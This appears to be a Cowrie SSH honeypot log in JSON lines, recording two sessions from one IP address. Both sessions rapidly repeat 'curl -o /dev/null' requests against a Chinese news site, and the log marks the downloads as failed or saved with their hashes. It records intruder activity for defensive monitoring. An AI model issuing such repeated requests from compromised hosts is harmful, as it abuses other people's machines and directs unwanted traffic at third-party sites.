{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.374691Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.387118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.388326Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.405451Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.407037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.430644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.431881Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.504090Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.506969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.508972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.524209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.525868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.550702Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.558843Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.560161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.566526Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.568100Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.578109Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.579650Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.600976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.602114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.607186Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.608019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.619660Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.620990Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.722847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.739950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.765780Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.829628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.831331Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.835240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.836335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.838852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.840154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.845778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.887960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.889302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.892509Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.893635Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.905675Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.907490Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.944530Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.945869Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.964330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.965634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:49.968728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.969798Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.982654Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:49.984508Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.030989Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.032093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.055548Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.056769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.064877Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.065955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.090146Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.091911Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.137954Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.140036Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.223352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.268307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.269617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.274591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.275465Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.324925Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.326272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.330855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.331876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.360300Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.362407Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.363554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.365672Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.368193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.369061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.460074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.461227Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.464294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.465347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.470140Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.471423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.513481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.514726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.517988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.519000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.520726Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.522519Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.539272Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.550721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.551727Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.563817Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.564824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.586376Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.587686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.590716Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.591943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.607921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.609006Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.631704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.632927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.651985Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.653002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.681661Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.682897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.685297Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.708697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.709846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.721962Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.724025Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.731968Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.733309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.734517Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.756592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.757782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.772178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.773441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.800429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.801868Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.812888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.814259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.838920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.840069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.891449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
